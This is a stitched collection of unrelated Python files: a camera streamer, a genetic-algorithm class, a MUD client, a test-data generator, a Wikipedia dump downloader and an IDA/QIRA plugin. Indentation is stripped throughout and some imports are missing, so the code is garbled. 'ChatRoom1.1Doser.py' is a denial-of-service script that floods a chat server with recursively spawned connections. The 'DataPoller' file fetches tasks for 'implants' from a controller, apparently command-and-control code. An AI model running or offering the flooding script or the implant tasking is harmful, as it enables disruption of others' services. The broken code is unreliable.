from datetime import datetime
from threading import Thread
from queue import Queue
from time import time
from idp206.calibration import Calibration
CAMERA_DEFAULT_PATH_TEMPLATE = 'http://%s:%d/stream/video.mjpeg'
CAMERA_INFO = {
'idpcam1': ('idpcam1.eng.cam.ac.uk', 8080),
'idpcam2': ('idpcam2.eng.cam.ac.uk', 8080)
}
REMOTE_SERVER_ADDRESS = ('gate.eng.cam.ac.uk', 22)
LOCAL_BIND_ADDRESS = 'localhost'
DEFAULT_CALIBRATION_IMAGES_PATH = 'calib/images'
SSH_USERNAME=''
SSH_PASSWORD=''
class Camera:
""" Main camera class """
def __init__(self, name, address, port, local_port=8080, calibration=None):
self.name = name
self.address = address
self.port = port
self.local_port = local_port
if calibration and not isinstance(calibration, Calibration):
            raise ValueError(
                f'calibration needs to be an instance of {Calibration} but is {type(calibration)}')
self.calibration = calibration
@contextmanager
def _open_camera(self):
capture = cv.VideoCapture(CAMERA_DEFAULT_PATH_TEMPLATE % (self.address, self.port))
try:
yield capture
finally:
capture.release()
@contextmanager
def _open_camera_ssh_tunnel(self):
with open_tunnel(
REMOTE_SERVER_ADDRESS,
ssh_username=SSH_USERNAME,
ssh_password=SSH_PASSWORD,
remote_bind_address=(self.address, self.port),
local_bind_address=(LOCAL_BIND_ADDRESS, self.local_port)
) as _:
capture = cv.VideoCapture(CAMERA_DEFAULT_PATH_TEMPLATE % (LOCAL_BIND_ADDRESS, self.local_port))
try:
yield capture
finally:
capture.release()
def open(self, ssh_tunnel=False):
""" Establish connection to the camera """
if ssh_tunnel:
return self._open_camera_ssh_tunnel()
return self._open_camera()
def _get_default_dirpath(self):
dirname_template = f'{self.name} (%d-%m-%Y %H.%M.%S)'
dirpath = DEFAULT_CALIBRATION_IMAGES_PATH + '/' + datetime.now().strftime(dirname_template)
        os.makedirs(dirpath, exist_ok=True)
return dirpath
def _frame_paths(self, dirpath='', prefix='calib_', image_format='jpg', index=0):
if not dirpath:
dirpath = self._get_default_dirpath()
while(True):
path = f'{dirpath}/{prefix}{index}.{image_format}'
yield path
index += 1
def _get_downloader(self, queue, interval=0.5, *args, **kwargs):
def downloader():
for path in self._frame_paths(*args, **kwargs):
start = time()
while(True):
frame = queue.get()
if (time() - start) > interval:
success = cv.imwrite(path, frame)
if not success:
raise RuntimeError("Can't save images")
break
queue.task_done()
return downloader
def download_frames(self, *args, ssh_tunnel=False, **kwargs):
""" Download frames that could be used for camera calibration. """
queue = Queue()
Thread(target=self._get_downloader(queue, *args, **kwargs), daemon=True).start()
self.show(output=queue, ssh_tunnel=ssh_tunnel, show_info=False)
queue.join()
def show(self, output=None, ssh_tunnel=False, show_info=True):
""" Stream the camera ouput """
with self.open(ssh_tunnel=ssh_tunnel) as cap:
try:
start = None
while cap.isOpened():
_, frame = cap.read()
if show_info:
end = time()
if start:
fps = 1 / (end - start)
frame = cv.putText(
frame,
f'FPS: {fps:.2f}',
(0, 64),
cv.FONT_HERSHEY_SIMPLEX,
1,
(0, 0, 255),
1,
cv.LINE_AA
)
start = end
cv.imshow(f'{self.name}', frame)
cv.waitKey(2)
if output:
output.put(frame)
except KeyboardInterrupt:
# print("Cancelling...")
cv.destroyAllWindows()
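# Minimal usage sketch (illustrative only, not part of the original module; assumes the
# SSH_USERNAME/SSH_PASSWORD constants above are filled in and that 'idpcam1' is reachable):
if __name__ == '__main__':
    cam_name = 'idpcam1'
    cam_address, cam_port = CAMERA_INFO[cam_name]
    camera = Camera(cam_name, cam_address, cam_port)
    camera.show(ssh_tunnel=True)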
|
Generation.py
|
import math
from multiprocessing import Process, Array
from BreedingPool import *
class Generation():
"""
A group of chromosomes
"""
def __init__(self, generationType, population):
self.generationType = generationType
self.population = population
def copy(self):
"""
Return a deep copy of this generation
:rtype: Generation
"""
newPopulation = []
for chromosome in self.population:
newPopulation.append(chromosome.copy())
return Generation(self.generationType, newPopulation)
def getNextGeneration(self, size, elitism, randIndividuals, randFitness, mutationRate, mutationSTDEV):
"""
Return a new generation of individuals. To get multithreading, call doFitnessTests before this function
:param size: the size of the new generation
:type size: int
:param elitism: preserve the n most fit individuals without mutations or crossovers
:type elitism: int
:param randIndividuals: add n random chromosomes to the breeding population
:type randIndividuals: int
:param randFitness: random individuals may have very low fitness. If not None, the maximum of this value and
the actual random fitness is used
:type randFitness: float
:param mutationRate: the average number of mutations each gene will undergo
:type mutationRate: float
:param mutationSTDEV: the standard deviation for the number of mutations each gene will undergo
:type mutationSTDEV: float
:rtype: Generation
"""
newPopulation = []
breedingPopulation = []
#preserve some elite individuals
newPopulation += self.getNMostFit(elitism)
#add all individuals with fitness greater than 0 to the breeding population
for chromosome in self.population:
if chromosome.getFitness() > 0:
breedingPopulation.append(chromosome)
#add some randomized individuals to the breeding population
for r in xrange(randIndividuals):
rando = self.generationType.chromosomeType.getRandomChromosome()
rando.doFitnessTest()
if randFitness is not None:
rando.fitness = max(rando.fitness, randFitness)
breedingPopulation.append(rando)
#breed a new generation of chromosomes
breedingPool = BreedingPool(breedingPopulation)
while len(newPopulation) < size:
newChromosome = breedingPool.get() + breedingPool.get()
newChromosome.mutate(mutationRate, mutationSTDEV)
newPopulation.append(newChromosome)
return Generation(self.generationType, newPopulation)
def doFitnessTests(self, threads=1):
"""
Measure the fitness of each chromosome (if the chromosome has not been previously measured)
        :param threads: the number of threads to use on this operation
"""
if threads <= 1:
for chromosome in self.population:
chromosome.doFitnessTest()
else:
fitness_calculation_result = Array('d', len(self.population))
def testFunct(chromosomes, start, end):
print end - start
index = start;
while index < end:
chromosomes[index].doFitnessTest()
fitness_calculation_result[index] = chromosomes[index].fitness
index += 1
# --- Commented by MR. I do not understand why we do this work twice:
# --- 1 in common, second in treads (in testFunct)
#for chromosome in self.population:
# chromosome.doFitnessTest()
procs = []
begin = 0
chunksize = int(math.floor(len(self.population) / threads))
for t in xrange(threads):
p = None
if t+1 == threads: #if it is the last thread then give it all remaining
p = Process(target=testFunct, args=(self.population,begin,len(self.population)))
else:
p = Process(target=testFunct, args=(self.population,begin,begin+chunksize))
p.start()
begin += chunksize
procs.append(p)
for p in procs:
p.join()
            # Added by MR: using a shared array to get the calculated fitness values back into the main process
for i in xrange(len(self.population)):
self.population[i].fitness = fitness_calculation_result[i]
def getMostFit(self):
"""
Return the most fit individual in a generation. Returns None if no individual is more than "0 fit"
:rtype: Chromosome
"""
mostFit = -1
rVal = None
for chromosome in self.population:
            fitness = chromosome.getFitness()
if fitness > 0 and fitness > mostFit:
mostFit = fitness
rVal = chromosome
return rVal
def getNMostFit(self, N):
"""
Return the N members of this generation that have the highest fitness
:rtype: [Chromosome]
"""
if N == 0:
return []
self.population = sorted(self.population)
return self.population[-1 * N:]
def data(self):
"""
Return an object that can be used to convert a generation to yaml
"""
data = {}
for index, chromosome in enumerate(self.population):
data[index] = chromosome.data()
return data
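# Example evolution loop (a rough sketch, kept as comments because GenerationType and
# Chromosome are defined elsewhere in this project; the names below are illustrative only):
#   gen = Generation(generationType, initialPopulation)
#   for i in xrange(100):
#       gen.doFitnessTests(threads=4)
#       gen = gen.getNextGeneration(size=len(gen.population), elitism=2, randIndividuals=5,
#                                   randFitness=None, mutationRate=0.05, mutationSTDEV=0.01)
#   best = gen.getMostFit()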
|
ChatRoom1.1Doser.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import socket
import os
import time
import threading
import Queue
import sys
import argparse
from multiprocessing import Process
print """\33[91m
═════════════════════════════════════════════════════════
███████ ██████ ███████
█ █ █ █ ║
█ █════╗ █ ╔═█ ║
█═════════════█ ╚█ ║█═══╝
█ ██████ ║█
█ █ █ ╚╗█ ╔═══════Server
█════════╗ █ █ ╚═█ ║
███████ ║ █ █ ███████
Chat Room Client════════╝
═════════════════════════════════════════════════════════
\33[92m"""
quit = Queue.Queue()
tick = Queue.Queue()
path = os.path.realpath(__file__)
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--screen", help="This is used by the script to make a screen. Not necessarily needed for regular users.")
args = parser.parse_args()
cv = "1.1"
username = raw_input("Name:")
server = raw_input("Server IP[127.0.0.1]:")
port = raw_input("Server Port[22550]:")
if port == "":
port = "22550"
else:
pass
if server == "":
server = "127.0.0.1"
else:
pass
print port
class connect(object):
def __init__(self, server, port, username, quit, tick):
self.tick = tick
self.quit = quit
self.server = server
self.port = port
self.username = username
self.con()
def con(self):
#try:
global cv
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server_address = (self.server, int(self.port))
self.sock.connect(server_address)
except:
print "Error...\nUnable to connect to " + self.server
os._exit(0)
self.sock.settimeout(60)
self.sock.send("cv:" + cv)
compatible = self.sock.recv(1024)
if compatible == "comp:1":
pass
else:
print """\33[91m
***************************************************
Error Server is on version """ + compatible[7:] + """
***************************************************
"""
sys.exit()
os._exit(0)
self.sock.send("user:" + str(random.randint(0, 9999999)))
nc = self.sock.recv(1024)
if "error:" in nc:
print """\33[91m
***************************************************
Error while sending username:
""" + nc[6:] + """
***************************************************
"""
os._exit(0)
#threading.Thread(target = self.ping, args=()).start()
threading.Thread(target = self.con, args=()).start()
#self.screen.start()
quit = False
while True:
#inp = raw_input(">>")
#time.sleep(.2)
#send = str(random.randint(0, 9))
#self.sock.send(send)
#print send
time.sleep(1)
else:
os._exit(0)
def quitcheck(quit):
while True:
time.sleep(1)
if quit.empty() == True:
pass
else:
os._exit(0)
threading.Thread(target = quitcheck, args=(quit,)).start()
threading.Thread(target=connect, args=(server, port, username, quit, tick)).start()
|
pycat.py
|
#!/usr/bin/env python3
from proxy import proxy
from select import select
import importlib
import json
import os
import pprint
import re
import sys
import telnetlib
import threading
import traceback
telnetlib.GMCP = b'\xc9'
class Session(object):
def __init__(self, world_module, port, arg):
self.mud_encoding = 'iso-8859-1'
self.client_encoding = 'utf-8'
self.gmcp = {}
self.world_module = world_module
self.arg = arg
self.world = world_module.getClass()(self, self.arg)
try:
self.socketToPipeR, self.pipeToSocketW, self.stopFlag, runProxy = proxy('::1', port)
self.pipeToSocketW = os.fdopen(self.pipeToSocketW, 'wb')
self.proxyThread = threading.Thread(target=runProxy)
self.proxyThread.start()
host_port = self.world.getHostPort()
self.log("Connecting")
self.telnet = self.connect(*host_port)
self.log("Connected")
except:
self.log("Shutting down")
self.stopFlag.set()
self.world.quit()
raise
def join(self):
self.thr.join()
def log(self, *args, **kwargs):
if len(args) == 1 and type(args[0]) == str:
line = args[0]
else:
line = pprint.pformat(args)
self.pipeToSocketW.write("---------\n".encode(self.client_encoding))
self.pipeToSocketW.write(line.encode(self.client_encoding))
self.pipeToSocketW.write(b"\n")
self.pipeToSocketW.flush()
def strip_ansi(self, line):
return re.sub(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]', '', line)
def gmcpOut(self, msg):
self.telnet.sock.sendall(telnetlib.IAC + telnetlib.SB + telnetlib.GMCP + msg.encode(self.mud_encoding) + telnetlib.IAC + telnetlib.SE)
def iac(self, sock, cmd, option):
if cmd == telnetlib.WILL:
if option == telnetlib.GMCP:
self.log("Enabling GMCP")
sock.sendall(telnetlib.IAC + telnetlib.DO + option)
self.gmcpOut('Core.Hello { "client": "Cizra", "version": "1" }')
supportables = ['char 1', 'char.base 1', 'char.maxstats 1', 'char.status 1', 'char.statusvars 1', 'char.vitals 1', 'char.worth 1', 'comm 1', 'comm.tick 1', 'group 1', 'room 1', 'room.info 1']
self.gmcpOut('Core.Supports.Set ' + str(supportables).replace("'", '"'))
self.gmcpOut('request room')
self.gmcpOut('request char')
elif option == telnetlib.TTYPE:
self.log("Sending terminal type 'Cizra'")
sock.sendall(telnetlib.IAC + telnetlib.DO + option +
telnetlib.IAC + telnetlib.SB + telnetlib.TTYPE + telnetlib.BINARY + b'Cizra' + telnetlib.IAC + telnetlib.SE)
else:
sock.sendall(telnetlib.IAC + telnetlib.DONT + option)
elif cmd == telnetlib.SE:
data = self.telnet.read_sb_data()
if data and data[0] == ord(telnetlib.GMCP):
try:
self.handleGmcp(data[1:].decode(self.mud_encoding))
except Exception as e:
traceback.print_exc()
def handleGmcp(self, data):
# this.that {JSON blob}
# TODO: move into clients
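        # e.g. (illustrative message, not taken from the source) 'char.vitals {"hp": 100}'
        # ends up stored as self.world.gmcp == {'char': {'vitals': {'hp': 100}}}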
space_idx = data.find(' ')
whole_key = data[:space_idx]
value_json = data[space_idx + 1:]
nesting = whole_key.split('.')
current = self.world.gmcp
for nest in nesting[:-1]:
if nest not in current:
current[nest] = {}
current = current[nest]
lastkey = nesting[-1]
try:
val = json.loads(value_json)
except json.decoder.JSONDecodeError:
val = {"string": value_json}
if lastkey not in current:
current[lastkey] = {}
current[lastkey] = val
self.world.handleGmcp(whole_key, val)
def connect(self, host, port):
t = telnetlib.Telnet()
t.set_option_negotiation_callback(self.iac)
# t.set_debuglevel(1)
t.open(host, int(port))
return t
def send(self, line):
print("> ", line)
self.telnet.write((line + '\n').encode(self.mud_encoding))
def handle_from_telnet(self):
try:
data = self.telnet.read_very_eager()
except:
self.log("EOF on telnet")
self.stopFlag.set()
self.world.quit()
raise
try:
data = data.decode(self.mud_encoding)
except UnicodeError as e:
print("Unicode error:", e)
print("Data was:", data)
data = ''
if not data:
_ = self.telnet.read_sb_data()
prn = []
for line in data.split('\n'):
if line:
replacement = None
try:
replacement = self.world.trigger(line.strip())
except Exception as e:
traceback.print_exc()
if replacement is not None:
line = replacement
prn.append(line)
self.pipeToSocketW.write('\n'.join(prn).encode(self.mud_encoding))
self.pipeToSocketW.flush()
def show(self, line):
self.pipeToSocketW.write(line.encode(self.client_encoding))
self.pipeToSocketW.flush()
def handle_from_pipe(self):
data = b'' # to handle partial lines
try:
data += os.read(self.socketToPipeR, 4096)
lines = data.split(b'\n')
            if lines[-1] != b'': # received partial line, don't process
data = lines[-1]
else:
data = b''
lines = lines[:-1] # chop off either the last empty line, or the partial line
for line in lines:
line = line.decode(self.client_encoding)
                if line.endswith('\r'):
                    line = line[:-1]
self.handle_output_line(line)
except EOFError:
self.log("EOF in pipe")
self.stopFlag.set()
self.world.quit()
raise
def handle_output_line(self, data):
pprint.pprint(data)
if data == '#reload' and self.world:
self.log('Reloading world')
try:
state = self.world.state
gmcp = self.world.gmcp
self.world.quit()
self.world_module = importlib.reload(self.world_module)
self.world = self.world_module.getClass()(self, self.arg)
self.world.state = state
self.world.gmcp = gmcp
except Exception:
traceback.print_exc()
return
else:
handled = False
try:
handled = self.world.alias(data)
except Exception as e:
traceback.print_exc()
else:
if not handled:
self.send(data)
def run(self):
try:
while True:
fds, _, _ = select([self.telnet.get_socket(), self.socketToPipeR], [], [])
for fd in fds:
if fd == self.telnet.get_socket():
self.handle_from_telnet()
elif fd == self.socketToPipeR:
self.handle_from_pipe()
except Exception as e:
self.log("Exception in run():", e)
finally:
self.log("Closing")
self.telnet.close()
def main():
if len(sys.argv) < 3 or len(sys.argv) > 4:
print("Usage: {} worldmodule (without .py) port [arg]".format(sys.argv[0]))
exit(1)
world_module = importlib.import_module(sys.argv[1])
port = int(sys.argv[2])
arg = sys.argv[3] if len(sys.argv) == 4 else None
ses = Session(world_module, port, arg)
ses.run()
assert(__name__ == '__main__')
main()
|
datapoller.py
|
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import api
import json
class DataPoller(object):
"""Class for polling for data from the BLiP controller
Beacon Filters and Tasking will be received and stored
locally and used to process each packet seen.
"""
def __init__(
self, interval=5, beacon_filters=None,
task_queue=None, logger=print):
""" Constructor
:type interval: int
:param interval: Check interval (seconds)
:type beacon_filters: dict
:param beacon_filters: Dictionary of {beacon filter -> beacon handler}
:type task_queue: dict
:param task_queue: Dictionary of Implant tasks {uuid -> tasks}
"""
self.interval = interval
self.beacon_filters = beacon_filters
self.task_queue = task_queue
self.running = True
        self.logger = logger
        self.thread = None
def check_beacon_filters(self):
"""Get Beacon Filters from the controller and update the local list"""
self.logger("Checking for new Beacon filters")
try:
new_beacon_filters = api.get_beacon_filters()['result']
self.beacon_filters.beacon_update(new_beacon_filters)
except (TypeError, KeyError):
self.logger("No Beacon Filters received")
def check_tasks(self):
"""Get Tasks from the controller and update the queue"""
self.logger("Checking for new Tasks")
implants = api.get_implants()
try:
implants = implants['result']
for implant in implants:
uuid = int(implant['uuid'])
tasks = implant['all_tasks']
for task in tasks:
#print("uuid: %s => %s" % (uuid, json.loads(task)))
self.task_queue.add_task(uuid, json.loads(task))
except (TypeError, KeyError):
self.logger("No Tasks received")
self.logger("Implant info received: %s" % implants)
def loop(self):
"""Run forever"""
while self.running:
self.check_tasks()
self.check_beacon_filters()
time.sleep(self.interval)
    def stop(self):
        self.running = False
        if self.thread is not None:
            self.thread.join()
def start(self):
self.running = True
self.thread = threading.Thread(target=self.loop, args=())
self.thread.daemon = True
self.thread.start()
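# Minimal usage sketch (the beacon_filters/task_queue arguments are hypothetical stand-ins
# for containers providing the beacon_update()/add_task() methods this class expects):
#   poller = DataPoller(interval=10, beacon_filters=filters, task_queue=tasks)
#   poller.start()    # polls the controller in a background daemon thread
#   ...
#   poller.stop()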
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(prog='Lp')
parser.add_argument("-v", "--verbose", help="increase output verbosity",
action="store_true", default=False)
parser.add_argument("-d", "--daemon", help="run in background (daemonize)",
choices=['start', 'stop', 'restart'],
default=False)
args = parser.parse_args()
dp = DataPoller()
dp.verbose = args.verbose
if args.daemon == 'start':
print("start")
dp.start()
elif args.daemon == 'stop':
print("stop")
dp.stop()
elif args.daemon == 'restart':
print("restart")
        dp.stop()
        dp.start()
else:
print("loop")
dp.loop()
|
randomi.py
|
# Meet randomI Mk II, a random data generator for test data generation
# For random generation of numbers import randint
from random import randint
# Importing the time for benchmarking purposes
import time
from datetime import date
# Importing for multi core processing
import multiprocessing
# randomI function which creates each file
def randomI(units, rows, rowLength, partstart):
for setcounter in range(0, units):
writeFile(generateFile(rows, rowLength), setcounter, partstart)
# Function for generating the content of one single file
def generateFile(rows, rowLength):
content = []
for y in range(0, rows):
content.append(generateRow(rowLength))
return content
# Function for generating the content of one single row randomly
def generateRow(rowLength):
row = ""
for z in range(0, rowLength):
row = row + str(randint(0, 9))
return row
# Function for writing data into a file
def writeFile(content, setcounter, partstart):
    filenumber = int(setcounter) + int(partstart)
    with open("testdata/file" + str(filenumber) + ".txt", "w") as file:
        for w in range(0, len(content)):
            file.write(content[w] + "\n")
if __name__ == '__main__':
# Getting the user input
print("Hello World")
units = int(input("How many units would you like to generate? "))
rows = int(input("How many rows should each unit have? "))
rowLength = int(input("How long should each row be? "))
cores = int(input("How many cores do you want to use? "))
    # Splitting up the units (integer division; the last core also takes the remainder)
    count = int(0)
    partsize = units // cores
    remainder = units % cores
    # For benchmarking starting the timer now
    start_time = time.time()
    # Initialize and prepare cores for process
    while count < cores:
        partstart = partsize * count
        # Give the remaining units to the last core so no files are skipped or overwritten
        units_for_core = partsize + remainder if count == cores - 1 else partsize
        globals()["p" + str(count)] = multiprocessing.Process(target=randomI, args=(units_for_core, rows, rowLength, partstart))
        count = count + 1
# Starting each core
count = int(0)
while count < cores:
globals()["p" + str(count)].start()
print("Core " + str(count) + " started.")
count = count + 1
print("Working...")
# Joining each core for the process
count = int(0)
while count < cores:
globals()["p" + str(count)].join()
count = count + 1
# Finishing up the process
sec = time.time() - start_time
print("Data is generated. Have fun!")
print("randomI took " + str(sec) + " seconds for execution.")
|
wiki_dump_download.py
|
import argparse
import glob
import hashlib
import json
import logging
import os
import threading
import urllib.request
from datetime import datetime
parser = argparse.ArgumentParser(description='WikiDump Downloader')
parser.add_argument('--data-path', type=str, default="./data/", help='the data directory')
parser.add_argument('--compress-type', type=str, default='bz2',
help='the compressed file type to download: 7z or bz2 [default: bz2]')
parser.add_argument('--threads', type=int, default=3, help='number of threads [default: 3]')
parser.add_argument('--start', type=int, default=1, help='the first file to download [default: 1]')
parser.add_argument('--end', type=int, default=-1, help='the last file to download [default: -1]')
parser.add_argument('--verify', action='store_true', default=False, help='verify the dump files in the specific path')
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)s) %(message)s',
)
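# Typical invocations (illustrative; assumes dumpstatus.json has already been placed in --data-path):
#   python wiki_dump_download.py --data-path ./data/ --compress-type bz2 --threads 4 --start 1 --end 10
#   python wiki_dump_download.py --data-path ./data/ --verify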
def download(dump_status_file, data_path, compress_type, start, end, thread_num):
url_list = []
file_list = []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
dump_files = sorted(list(dump_dict.keys()))
if args.end > 0 and args.end <= len(dump_files):
dump_files = dump_files[start - 1:end]
else:
dump_files = dump_files[start - 1:]
# print all files to be downloaded.
print("All files to download ...")
for i, file in enumerate(dump_files):
print(i + args.start, file)
file_num = 0
for dump_file in dump_files:
file_name = data_path + dump_file
file_list.append(file_name)
# url example: https://dumps.wikimedia.org/enwiki/20180501/enwiki-20180501-pages-meta-history1.xml-p10p2123.7z
url = "https://dumps.wikimedia.org" + dump_dict[dump_file]['url']
url_list.append(url)
file_num += 1
print('Total file ', file_num, ' to be downloaded ...')
json_data.close()
task = WikiDumpTask(file_list, url_list)
threads = []
for i in range(thread_num):
t = threading.Thread(target=worker, args=(i, task))
threads.append(t)
t.start()
logging.debug('Waiting for worker threads')
main_thread = threading.currentThread()
for t in threading.enumerate():
if t is not main_thread:
t.join()
def existFile(data_path, cur_file):
exist_file_list = glob.glob(data_path + "*." + args.compress_type)
exist_file_names = [os.path.basename(i) for i in exist_file_list]
cur_file_name = os.path.basename(cur_file)
if cur_file_name in exist_file_names:
return True
return False
def md5(file):
hash_md5 = hashlib.md5()
with open(file, "rb") as f:
for chunk in iter(lambda: f.read(40960000), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def verify(dump_status_file, compress_type, data_path):
print("Verify the file in folder:", data_path)
pass_files, miss_files, crash_files = [], [], []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
for i, (file, value) in enumerate(dump_dict.items()):
gt_md5 = value['md5']
print("#", i, " ", file, ' ', value['md5'], sep='')
if existFile(data_path, file):
file_md5 = md5(data_path + file)
if file_md5 == gt_md5:
pass_files.append(file)
else:
crash_files.append(file)
else:
miss_files.append(file)
print(len(pass_files), "files passed, ", len(miss_files), "files missed, ", len(crash_files), "files crashed.")
if len(miss_files):
print("==== Missed Files ====")
print(miss_files)
if len(crash_files):
print("==== Crashed Files ====")
print(crash_files)
def main():
dump_status_file = args.data_path + "dumpstatus.json"
if args.verify:
verify(dump_status_file, args.compress_type, args.data_path)
else:
download(dump_status_file, args.data_path, args.compress_type, args.start, args.end, args.threads)
'''
The WikiDumpTask class contains the list of dump files to be downloaded.
The assign_task function will be called by workers to grab a task.
'''
class WikiDumpTask(object):
def __init__(self, file_list, url_list):
self.lock = threading.Lock()
self.url_list = url_list
self.file_list = file_list
self.total_num = len(url_list)
def assign_task(self):
logging.debug('Assign tasks ... Waiting for lock')
self.lock.acquire()
url = None
file_name = None
cur_progress = None
try:
# logging.debug('Acquired lock')
if len(self.url_list) > 0:
url = self.url_list.pop(0)
file_name = self.file_list.pop(0)
cur_progress = self.total_num - len(self.url_list)
finally:
self.lock.release()
return url, file_name, cur_progress, self.total_num
'''
worker is the main function for each thread.
'''
def worker(work_id, tasks):
logging.debug('Starting.')
# grab one task from task_list
while 1:
url, file_name, cur_progress, total_num = tasks.assign_task()
if not url:
break
logging.debug('Assigned task (' + str(cur_progress) + '/' + str(total_num) + '): ' + str(url))
if not existFile(args.data_path, file_name):
urllib.request.urlretrieve(url, file_name)
logging.debug("File Downloaded: " + url)
else:
logging.debug("File Exists, Skip: " + url)
logging.debug('Exiting.')
return
if __name__ == '__main__':
start_time = datetime.now()
main()
time_elapsed = datetime.now() - start_time
print('Time elapsed (hh:mm:ss.ms) {}'.format(time_elapsed))
|
qira.py
|
import idaapi
import threading
import time
wsserver = None
qira_address = None
# this handles all receiving
msg_queue = [] # a plain Python list; append/pop are thread-safe under the GIL
def handle_message_queue():
global msg_queue
while len(msg_queue) > 0:
dat = msg_queue[0].split(" ")
msg_queue = msg_queue[1:]
if dat[0] == "setaddress" and dat[1] != "undefined":
try:
a = idaapi.toEA(0, int(str(dat[1][2:]),16))
jump_to(a)
        except Exception:
idaapi.msg("[QIRA Plugin] Error processing the address\n")
def start_server():
global wsserver
wsserver = SimpleWebSocketServer('', 3003, QiraServer)
if wsserver is not None:
idaapi.msg("[QIRA Plugin] Starting WS Server\n")
wsserver.serveforever()
def set_qira_address(la):
global qira_address
ea = 0
if qira_address is not None and qira_address != BADADDR:
ea = idaapi.toEA(0, qira_address)
idaapi.del_bpt(ea)
qira_address = la
idaapi.add_bpt(qira_address, 0, BPT_SOFT)
EnableBpt(qira_address, False)
def jump_to(a):
global qira_address
if a is not None:
if (a != qira_address) and (a != BADADDR):
set_qira_address(a)
idaapi.jumpto(qira_address, -1, 0)
else:
idaapi.jumpto(qira_address, -1, 0)
def ws_send(msg):
global wsserver
if (wsserver is not None) and (msg is not None):
for conn in wsserver.connections.itervalues():
conn.sendMessage(msg)
def update_address(addr_type, addr):
if (addr_type is not None) and (addr is not None):
cmd = "set%s 0x%x" % (addr_type, addr)
ws_send(cmd)
def update_comment(addr, rpt):
cmt = idaapi.get_cmt(addr, rpt)
if cmt is not None:
ws_send("setcmt 0x%x %s" % (addr, cmt))
class MyIDAViewWrapper(idaapi.IDAViewWrapper):
def __init__(self, viewName):
idaapi.IDAViewWrapper.__init__(self, viewName)
self.old_addr = None
self.addr = None
def OnViewCurpos(self):
self.addr = idaapi.get_screen_ea()
if (self.old_addr != self.addr):
if (idaapi.isCode(idaapi.getFlags(self.addr))):
# don't update the address if it's already the qira address or None
if (self.addr is not None) and (self.addr != qira_address):
#idaapi.msg("[QIRA Plugin] Qira Address %x \n" % (self.addr))
# Instruction Address
set_qira_address(self.addr)
update_address("iaddr", self.addr)
else:
# Data Address
update_address("daddr", self.addr)
self.old_addr = self.addr
class idbhook(idaapi.IDB_Hooks):
def cmt_changed(self, a, b):
update_comment(a, b)
return 0
class idphook(idaapi.IDP_Hooks):
def renamed(self, ea, new_name, local_name):
#print ea, new_name
ws_send("setname 0x%x %s" % (ea, new_name))
return 0
class uihook(idaapi.UI_Hooks):
def __init__(self):
idaapi.UI_Hooks.__init__(self)
self.binds = []
def preprocess(self, arg):
#print "preprocess", arg
return 0
def current_tform_changed(self, a1, a2):
#print "tform", idaapi.get_tform_title(a1)
tm = MyIDAViewWrapper(idaapi.get_tform_title(a1))
if tm.Bind():
self.binds.append(tm)
return 0
class qiraplugin_t(idaapi.plugin_t):
flags = 0
comment = "QEMU Interactive Runtime Analyser plugin"
help = "Visit qira.me for more infos"
wanted_name = "QIRA Plugin"
wanted_hotkey = "z"
def init(self):
threading.Thread(target=start_server).start()
idaapi.msg("[QIRA Plugin] Ready to go!\n")
self.w1 = None
#threading.Thread(target=poll_address).start()
self.idbhook = idbhook()
self.idbhook.hook()
self.idphook = idphook()
self.idphook.hook()
self.uihook = uihook()
self.uihook.hook()
return idaapi.PLUGIN_KEEP
def run(self, arg):
global qira_address
idaapi.msg("[QIRA Plugin] Syncing with Qira\n")
# sync names
for i in range(idaapi.get_nlist_size()):
ws_send("setname 0x%x %s" % (idaapi.get_nlist_ea(i), idaapi.get_nlist_name(i)))
# sync comment
addr = idaapi.get_segm_base(idaapi.get_first_seg())
while addr != idaapi.BADADDR:
for rpt in [True, False]:
update_comment(addr, rpt)
addr = idaapi.nextaddr(addr)
def term(self):
global wsserver
if wsserver is not None:
wsserver.close()
idaapi.msg("[QIRA Plugin] Plugin uninstalled!\n")
def PLUGIN_ENTRY():
return qiraplugin_t()
###########################################################
# #
# SimpleWebSocketServer #
# https://github.com/opiate/SimpleWebSocketServer.git #
# #
###########################################################
'''
The MIT License (MIT)
Copyright (c) 2013 Dave P.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
import SocketServer
import hashlib
import base64
import socket
import struct
import ssl
import time
import sys
import errno
import logging
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from select import select
class HTTPRequest(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
class WebSocket(object):
handshakeStr = (
"HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: WebSocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Protocol: qira\r\n"
"Sec-WebSocket-Accept: %(acceptstr)s\r\n\r\n"
)
hixiehandshakedStr = (
"HTTP/1.1 101 WebSocket Protocol Handshake\r\n"
"Upgrade: WebSocket\r\n"
